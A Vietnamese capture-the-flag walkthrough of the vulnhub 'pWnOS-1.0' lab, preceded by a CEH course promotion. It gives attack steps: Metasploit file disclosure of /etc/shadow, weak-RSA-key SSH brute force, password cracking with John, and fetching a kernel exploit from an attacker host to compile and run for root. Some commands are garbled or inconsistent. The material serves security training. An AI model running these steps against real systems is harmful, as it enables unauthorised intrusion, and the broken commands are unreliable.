Để có thể lấy chứng chỉ CEH Master trước tiên các bạn cần vượt qua kì thi CEH ANSI , khóa học CEH v12 sẽ cung cấp đầy đủ kiến thức cho các bạn, dĩ nhiên cần mua thêm voucher để thi và dump để luyện thi. Sau đó, các bạn đăng kí thi CEH Practice, cần có iLab và Voucher thi và muốn thi đậu cao hay chắc chắn thì tham gia khóa học CEH Master, rồi tiến hành thực hành tất cả các bài tập tại chuyên mục Master CEH. Lưu ý, hãy thi CEH ANSI trên 90 % để được khuyến mãi vuocher CEH Practice (ECC họ gọi là học bổng)

Hôm nay chúng ta sẽ giải quyết một thách thức CTF khác là “pWnOS-1.0” của penlab vulnhub. Bạn có thể tải xuống từ đây https://www.vulnhub.com/entry/pwnos-10,33/

Các lỗ hổng:

• Tiết lộ tệp tùy tiện / Arbitrary File Disclosure (để tiếng Việt nghe hơi khôi hài, nhưng vậy mới vui) CEH v12 Module 13
• Nâng cấp đặc quyền / Privilege Escalation (CEH v12 Module 6)
• Thông tin xác thực yếu / Weak Credentials (CEH v12 Module 6)

Phương pháp luận thâm nhập (Pentest methodology):

• Quét mạng (Nmap)
• Khai thác ứng dụng web (Metasploit)
• Giải nén tệp đã khai thác do lỗi Arbitrary File Disclosure
• Cách thứ nhất
• SSH Brute-force
• Tạo shell TTY (Thông qua khóa RSA SSH)
• Nâng cấp đặc quyền Kernel
• Cách khai thác thứ 2
• Bẻ khóa mật khẩu băm (John the ripper)
• Lấy TTY shell (thông qua đăng nhập SSH)
• Nâng cấp đặc quyền Kernel

Hãy bắt đầu nào các man CEH ANSI !!

Bắt đầu với lệnh netdiscover để xác định IP mục tiêu trong mạng cục bộ, trong mạng của tôi 192.168.1.105 là IP mục tiêu của CTF, bạn sẽ nhận được của bạn (dĩ nhiên rồi 🙂 /.

… hãy liệt kê thông tin cổng mở và giao thức trong mạng của mục tiêu với sự trợ giúp của lệnh nmap sau:

nmap –A 192.168.1.105

Từ kết quả chúng ta thấy cổng 22 cho SSH và 80, 1000 cho HTTP đang mở và có webmin với giao diện web đang chạy trên cổng 1000.

Các bạn có nghe về lỗi webmin, hãy thử vận may xem sao ….

Vì vậy, kiểm tra liên quan đến việc khai thác của nó bên trong Metasploit và may mắn thấy nó có thể bị những kẻ xấu lợi dụng để tiết lộ thông tin nhạy cảm tiềm ẩn.  Tiếp theo chúng ta sẽ khai thác để giải nén tệp / etc / passwd từ bên trong máy ảo của nạn nhân.

Như bạn có thể quan thấy  trong hình sau.

Hãy xem các lệnh thực thi trong hình, nếu cần các bạn hãy ghi chép lại

Như bạn có thể thấy rằng chúng ta đã có khóa được ủy quyền SSH và cũng có thể liệt kê tên người dùng từ bên trong mật khẩu. Bây giờ để có được khóa RSA của SSH, chúng ta có thể áp dụng sự kết hợp hợp lệ của cuộc tấn công brute-force của khóa được ủy quyền và khóa RSA.

Phương pháp đầu tiên để khai thác

Để làm như vậy, hãy tải xuống tệp tar với sự trợ giúp của lệnh sau.

wget https://github.com/offensive-security/exploit-database-bin-sploits.git

Sau đó giải nén tệp tar với sự trợ giúp của lệnh sau:

tar vxjf 5622.tar.bz2

Di chuyển vào thư mục giải nén và thực hiện lệnh sau để Lấy một tổ hợp phím hợp lệ.

cd rsa
grep -lr {allow_key}

Tuyệt vời, chúng tôi đã nhận được rsa_key thành công cho khóa được ủy quyền.

Hãy đăng nhập vào SSH bằng thông tin đăng nhập đã liệt kê ở trên

ssh -i 2048 / dcbe2a56e8cdea6d17495f6648329ee2-4679.pub obama@192.168.1.105

Yippeeee !! Chúng tôi đã đăng nhập thành công, hãy tìm chi tiết kernel và sau đó tìm kiếm khai thác của nó.

uname -a

Vì vậy, chúng tôi đã tìm thấy tệp chương trình C để khai thác 5092.c bên trong kali, hãy chuyển nó vào máy của Victim.

Bên trong shell của nạn nhân, chúng tôi chạy sau để tải xuống khai thác hạt nhân trong máy ảo của anh ấy và biên dịch nó sau đó Có quyền truy cập root khi thực thi

cd / tmp
wget http://192.168.1.107/5902.c
gcc 5092.c -o shell
shell chmod 777
./shell

Booommm! Ở đây chúng tôi có quyền truy cập Root.

Phương pháp 2 ^nd 

Như bạn đã thấy rằng với sự trợ giúp của khai thác Metasploit, chúng tôi đã tìm nạp thành công thông tin của tệp / etc / shadow. Vì vậy, với sự giúp đỡ của John, chúng tôi có thể bẻ khóa mật khẩu băm của tệp bóng.

john --wordlist = / usr / share / wordlists / rockou.txt pass

Vì vậy, chúng tôi đã có mật khẩu h4ckm3 cho máy ảo VMware, hãy sử dụng nó để đăng nhập SSH.

ssh vmware@192.168.1.105

Bây giờ lặp lại bước trên để leo thang đặc quyền root và sau khi khai thác nhân của nó, bạn sẽ có được root như trong hình.

Tác giả:  Aarti Singh / HA